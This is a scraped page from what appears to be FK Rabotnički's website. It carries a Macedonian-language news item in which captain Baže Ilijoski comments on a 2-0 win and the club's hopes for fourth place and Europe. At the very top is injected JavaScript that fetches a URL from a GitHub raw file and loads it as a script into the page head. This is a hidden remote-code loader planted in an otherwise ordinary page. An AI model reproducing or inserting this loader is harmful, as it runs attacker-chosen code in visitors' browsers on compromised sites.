;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Илијоски: Многу важна победа, сега пак размислуваме и за Европа
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Илијоски: Многу важна победа, сега пак размислуваме и за Европа

Работнички оствари значаен триумф (2-0) против Македонија ЃП, тимот реагираше најдобро кога беше најпотребно и повторно размислува за четвртото место кое можеби ќе донесе и излез во Европа. Од друга страна, полесно се дише со оглед дека опстанокот е речиси осигурен.

Капитенот Баже Илијоски вели дека Работнички секогаш игра најдобро кога е најпотребно.

„Полесно се дише. По подолга пауза остваривме победа, многу значајна за Работнички и позицијата на табелата. Речиси ги разрешивме дилемите околу опстанокот, а пред последните две кола сега повторно размислуваме и за тоа четврто место, кое можеби ќе води и во Лигата на УЕФА. Доколку успееме да славиме и на двата последни меча можеби ќе испадне и одлично за Работнички“, вели капитенот Баже Илијоски.

Во следното 35.коло, Работнички ќе и гостува на Беласица во Струмица.